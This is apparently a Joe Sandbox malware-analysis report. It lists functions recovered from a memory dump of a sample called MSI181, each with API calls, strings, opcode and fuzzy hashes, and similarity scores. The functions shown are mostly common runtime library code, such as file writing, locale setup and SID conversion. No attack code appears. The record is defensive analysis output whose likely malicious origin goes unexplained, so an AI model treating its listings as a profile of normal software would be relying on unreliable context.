Part of subcall function 005BA9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,005B6F5E,?,00000000,-00000008), ref: 005BAA67

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005C2059
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005C20A1
GetLastError.KERNEL32 ref: 005C2144

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 80dcaadf848219041e50cef628b48e0a8c987a4688fc46d57ba2aeb1fa3d90b1
Instruction ID: b7cb5ae8648bd1d1c7bc2dff7cb8e18bc19dbd49d75c15f89e94842318b15a97
Opcode Fuzzy Hash: 80dcaadf848219041e50cef628b48e0a8c987a4688fc46d57ba2aeb1fa3d90b1
Instruction Fuzzy Hash: E0D166B5D002489FCB15CFE8D884AADBFB9FF49310F18456EE916EB252D730A945CB50

Uniqueness

Uniqueness Score: -1.00%

Function 005A0116 Relevance: 6.3, APIs: 4, Instructions: 287COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005A011D
collate.LIBCPMT ref: 005A0126

Part of subcall function 0059EDF2: __EH_prolog3_GS.LIBCMT ref: 0059EDF9
Part of subcall function 0059EDF2: __Getcoll.LIBCPMT ref: 0059EE5D

Part of subcall function 00588C20: std::_Lockit::_Lockit.LIBCPMT ref: 00588C50
Part of subcall function 00588C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00588C78

__Getcoll.LIBCPMT ref: 005A016C
numpunct.LIBCPMT ref: 005A03C4

Part of subcall function 00586330: LocalAlloc.KERNEL32(00000040,?,00590E04,00000020,?,?,00589942,00000000,F302A5AA,?,?,?,?,005C50DD,000000FF), ref: 00586336

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: GetcollLockitstd::_$AllocH_prolog3H_prolog3_LocalLockit::_Lockit::~_collatenumpunct
String ID:
API String ID: 259100098-0
Opcode ID: bf5db6e0862fa268ee653c7ccb94b04ce3c5330b566733b8ba1548163c9cf169
Instruction ID: 584c83da751706072d9eb3d63de8f07d4989e05a2f7e09ae1ff804fbdd7c099f
Opcode Fuzzy Hash: bf5db6e0862fa268ee653c7ccb94b04ce3c5330b566733b8ba1548163c9cf169
Instruction Fuzzy Hash: 469175719112126AEB20BBB44C4AB7F7EA5FF86760F50582EFC09B7281DF745D0087A1

Uniqueness

Uniqueness Score: -1.00%

Function 005B24E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f797295c7406242cd3e7c14b55cfaee14155c52da19f49531adb2360d472622
Instruction ID: 77aa4983f523227fbbdd6cb44f78b44e3cb7546af2f8242b11ca763e9fe5839d
Opcode Fuzzy Hash: 2f797295c7406242cd3e7c14b55cfaee14155c52da19f49531adb2360d472622
Instruction Fuzzy Hash: 37218E7160420AAFDF30AF61CC65DAA7FA9BF89364F104915F8159B190DB30FD009B70

Uniqueness

Uniqueness Score: -1.00%

Function 0058CCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,F302A5AA), ref: 0058CD1C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 0058CD3C
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 0058CD6D
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 0058CD86

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: be583a178cab94357d0929aa8527c8cc7ad9520c78c97f7b3650ef8a06d7d6a5
Instruction ID: eb79558df64f81e0e006b90f2eed597b0b02acb7283756f16388e5ac8d484467
Opcode Fuzzy Hash: be583a178cab94357d0929aa8527c8cc7ad9520c78c97f7b3650ef8a06d7d6a5
Instruction Fuzzy Hash: A321AF70941619AFD7209F54DC09FAABFB8FB09B14F10422AF911BB6D0D7B06A048BE4

Uniqueness

Uniqueness Score: -1.00%

Function 005C3686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,005C3053,?,00000001,?,?,?,005C2198,?,?,00000000), ref: 005C369D
GetLastError.KERNEL32(?,005C3053,?,00000001,?,?,?,005C2198,?,?,00000000,?,?,?,005C271F,?), ref: 005C36A9

Part of subcall function 005C366F: CloseHandle.KERNEL32(FFFFFFFE,005C36B9,?,005C3053,?,00000001,?,?,?,005C2198,?,?,00000000,?,?), ref: 005C367F

___initconout.LIBCMT ref: 005C36B9

Part of subcall function 005C3631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,005C3660,005C3040,?,?,005C2198,?,?,00000000,?), ref: 005C3644

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,005C3053,?,00000001,?,?,?,005C2198,?,?,00000000,?), ref: 005C36CE

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 18ca5355235e9bdaa6d27bb4bb6e69f79cbaa7e060c038b7aa4c88f0aba724cd
Instruction ID: 3cfbe3c9879a8c2e8558b46be4429cfa2f013abd493a5e00b87de27636b58ea1
Opcode Fuzzy Hash: 18ca5355235e9bdaa6d27bb4bb6e69f79cbaa7e060c038b7aa4c88f0aba724cd
Instruction Fuzzy Hash: 49F01C3650412DBFCF622FD5DC08E893F66FB683A1B048055FE1996620C6328A60EF90

Uniqueness

Uniqueness Score: -1.00%

Function 005B1A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 005B1AFD

Strings

pow, xrefs: 005B1AD5, 005B1AF2

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: dd8d6d776f0317d140972b68a99c05cee751fed1eafedec12284fbb188e0414a
Instruction ID: 3765a2978f0427433e2b3e90c120cc7d371d16bfb086975aba9745b22a9bcf24
Opcode Fuzzy Hash: dd8d6d776f0317d140972b68a99c05cee751fed1eafedec12284fbb188e0414a
Instruction Fuzzy Hash: 4F51A061A09902CACB117714DD653FE7FE0FB50700FB04D69E0C5822A9FB35BC95AA8B

Uniqueness

Uniqueness Score: -1.00%

Function 0058D41C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0058D423
std::locale::_Init.LIBCPMT ref: 0058D465

Strings

2Z, xrefs: 0058D54F, 0058D580

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: H_prolog3_Initstd::locale::_
String ID: 2Z
API String ID: 3382595777-2484645983
Opcode ID: 590c5c197f3759aefbc0b751546ea0a36e02e68adfda1285fd3947245a112e45
Instruction ID: efea4d179db5a2ea310278913b2f8825ac40d96a3480a3a2b3829de58b3d7631
Opcode Fuzzy Hash: 590c5c197f3759aefbc0b751546ea0a36e02e68adfda1285fd3947245a112e45
Instruction Fuzzy Hash: BE717B349052589FDF15EFA4D450AECBFB2BF59314F284099EC827B292DB30A946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 005915FB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00591602
std::locale::_Init.LIBCPMT ref: 00591644

Strings

2Z, xrefs: 00591732, 0059175F

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: H_prolog3_Initstd::locale::_
String ID: 2Z
API String ID: 3382595777-2484645983
Opcode ID: 94f7932818b547f3aec0b0456bb8a112e06c0d0d01a207d722cab02e99bba375
Instruction ID: d1e128fadfbf8a748d53d7bcd1499120d72c0280b7557f8a841c4edb8b2acca6
Opcode Fuzzy Hash: 94f7932818b547f3aec0b0456bb8a112e06c0d0d01a207d722cab02e99bba375
Instruction Fuzzy Hash: D6719A38E0466A9FDF15DFA4C4906EDBFB2BF49314F284499E8827B342DB305946CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0059180A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00591811
std::locale::_Init.LIBCPMT ref: 00591859

Strings

2Z, xrefs: 0059194A, 0059197A

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: H_prolog3_Initstd::locale::_
String ID: 2Z
API String ID: 3382595777-2484645983
Opcode ID: 5d37f3a2c8c27f3308d62ca3ea9997da861e3357ccbeee4c7e25764e393504b7
Instruction ID: 8031760e5e99a9c53c7c99942639c447bcbecb9b3f172aa599b4f6232bb13004
Opcode Fuzzy Hash: 5d37f3a2c8c27f3308d62ca3ea9997da861e3357ccbeee4c7e25764e393504b7
Instruction Fuzzy Hash: 45717D34D04A2A9BCF14DF94D5906FCBFB2BF59710F544059E882BB281DB345D82DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00591A26 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00591A2D
std::locale::_Init.LIBCPMT ref: 00591A75

Strings

2Z, xrefs: 00591B66, 00591B96

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: H_prolog3_Initstd::locale::_
String ID: 2Z
API String ID: 3382595777-2484645983
Opcode ID: 7b755745570d66cd4926f84421bdef29b1773e7f0e41dc1a808b62cc11e321ef
Instruction ID: e4f171f62087d1b6446e05b100120118f0ceec8b399239c30757a8242b95cd15
Opcode Fuzzy Hash: 7b755745570d66cd4926f84421bdef29b1773e7f0e41dc1a808b62cc11e321ef
Instruction Fuzzy Hash: F4718E3490562A9BCF14DF94D490AFCBFB2BF59310F544059E8427B285EB345D82CB98

Uniqueness

Uniqueness Score: -1.00%

Function 005A1E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 005A1FD1

Strings

-, xrefs: 005A1FFF
0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 005A1F2F, 005A1F66, 005A1F6B

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: 2430b3168ebec815a8fca1835d5520a7c7a49367e3aac8b627a48b71c46b2a74
Instruction ID: 4cd94f24d6de0a3911cf43b006afb0be6c607ee1ff75689db4285ca626fae6bf
Opcode Fuzzy Hash: 2430b3168ebec815a8fca1835d5520a7c7a49367e3aac8b627a48b71c46b2a74
Instruction Fuzzy Hash: 8C51FF30B04689AEDF258EBC8485BBEBFF9BF47340F14449AE881D7281D3709941CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0058BD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 0058BF6E

Strings

true, xrefs: 0058BEAB
false, xrefs: 0058BE95

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: false$true
API String ID: 118556049-2658103896
Opcode ID: 62b92520f20d4a705013c15622b7768ba86dc01a2f9ba12d0d97a7ad23fbaf12
Instruction ID: 4c16c6bbc17ee4d9350cf62fbf7ea3d1380e0de20c30da4b206d48c739c88e58
Opcode Fuzzy Hash: 62b92520f20d4a705013c15622b7768ba86dc01a2f9ba12d0d97a7ad23fbaf12
Instruction Fuzzy Hash: B951D7B5D00748DFDB10DFA4C945BEEBBB8FF45300F14426AE845AB241E774AA85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 005870A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

\\?\, xrefs: 005871E3, 00587210
\\?\UNC\, xrefs: 00587173, 005871CE

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID:
String ID: \\?\$\\?\UNC\
API String ID: 0-3019864461
Opcode ID: 2390791d8075d7dcad6829714ad86b7cce79832be7a19c821bd8c8518f2aba8c
Instruction ID: b9cece4202a5c002a18efd7d2080154003a3a28580ca42994b8039c55af72215
Opcode Fuzzy Hash: 2390791d8075d7dcad6829714ad86b7cce79832be7a19c821bd8c8518f2aba8c
Instruction Fuzzy Hash: 7351E670A042099BDF14EF68C849FAEBFB5FF99304F20451DE841B7681DBB4A944CB94

Uniqueness

Uniqueness Score: -1.00%

Function 005A6059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 005A607E

Strings

RCC, xrefs: 005A6098
MOC, xrefs: 005A6090

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 7be3d7948228e8981a5a59c5b7d61292ad42ec3226f893127f8958214db55357
Instruction ID: 48b894ca8fd7d19c0b4a2f746fd084df88ecf3638f03275ad950b90cc46081a0
Opcode Fuzzy Hash: 7be3d7948228e8981a5a59c5b7d61292ad42ec3226f893127f8958214db55357
Instruction Fuzzy Hash: 40413771900209EFCF15DF98CC85AEEBFB5BF49304F188159F90867252D3359951DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0059DF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0059DF96
__cftoe.LIBCMT ref: 0059E01A

Strings

!%x, xrefs: 0059DFA7

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: 9096cefe45386ac0d978d0019872558459cc13a78ebeee702b5709c32a00cb74
Instruction ID: c523740e8c3167f7839023ab580886fc916ddcdbee71294a897234ef56294e53
Opcode Fuzzy Hash: 9096cefe45386ac0d978d0019872558459cc13a78ebeee702b5709c32a00cb74
Instruction Fuzzy Hash: D9314971D01209EBDF04EF94E886AEEBBB6FF48304F104419F805B7251EB75AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 005A19FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 005A1A01
__cftoe.LIBCMT ref: 005A1A7F

Strings

!%x, xrefs: 005A1A15

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: 4dd8208bbbbc0328a33fe19e34a2250921a70d0f9f765766bdaeac8456ec3a37
Instruction ID: d36398f2ef0c9792d785bc967cb87be985f9caceba006caa1939ab5e7dfaa88c
Opcode Fuzzy Hash: 4dd8208bbbbc0328a33fe19e34a2250921a70d0f9f765766bdaeac8456ec3a37
Instruction Fuzzy Hash: D9317732D15259AFEF04DF98E885AEEBFB6FF5A300F100019F844A7242D7759A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00585F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 00585F86
LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,F302A5AA), ref: 00585FF6

Strings

Invalid SID, xrefs: 00585FD4

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: ConvertFreeLocalString
String ID: Invalid SID
API String ID: 3201929900-130637731
Opcode ID: 4d4a31a75777dd7a1eba68cfe46307f64de4bd5a24b2a542c2a953e6c1a56e9c
Instruction ID: d7551308ec4eecf21e03bd3c72a013ef6b15f5b08b45c9f64db48c543131f24f
Opcode Fuzzy Hash: 4d4a31a75777dd7a1eba68cfe46307f64de4bd5a24b2a542c2a953e6c1a56e9c
Instruction Fuzzy Hash: 36218EB4A046099BDB14DF58C819BAFBFF8FB44714F10091EE905A7780E7B96A088BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00589070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0058909B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 005890FE

Strings

bad locale name, xrefs: 00589121

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 3988782225-1405518554
Opcode ID: 5aa2058b5464026e4eeef848e3d0647b3a1631514c791006f118c980be2c2f63
Instruction ID: 286f39eca87591aafa322510278631d6f80f36b50919b32648fc185653b0b005
Opcode Fuzzy Hash: 5aa2058b5464026e4eeef848e3d0647b3a1631514c791006f118c980be2c2f63
Instruction Fuzzy Hash: A021AE70905B84DED721CFA8C908B4BBFF4EF19710F148A9EE49597781D3B5A604CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0058F098 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0058F09F

Strings

true, xrefs: 0058F109
false, xrefs: 0058F0F6

Memory Dump Source

Source File: 00000003.00000002.1716273034.0000000000581000.00000020.00000001.01000000.00000006.sdmp, Offset: 00580000, based on PE: true

Associated: 00000003.00000002.1716223787.0000000000580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716333093.00000000005C7000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716357584.00000000005DC000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1716374932.00000000005E0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_580000_MSI181.jbxd

Similarity

API ID: H_prolog3_
String ID: false$true
API String ID: 2427045233-2658103896
Opcode ID: 32d4b21cdf608ac494d6ad6d43e2ed2cd6a6d10013d81d8961165e399a65f8c7
Instruction ID: 78d4fdbd4fccb01c5e59fd20af8ef1eb802296187481c67ca4b4b728bbf04d6d
Opcode Fuzzy Hash: 32d4b21cdf608ac494d6ad6d43e2ed2cd6a6d10013d81d8961165e399a65f8c7
Instruction Fuzzy Hash: 44118175941B46DECB21EFB8D849B8EBFF4BF09300F14851AF89197341EA30A504CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00590D24 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMONLIBRARYCODE

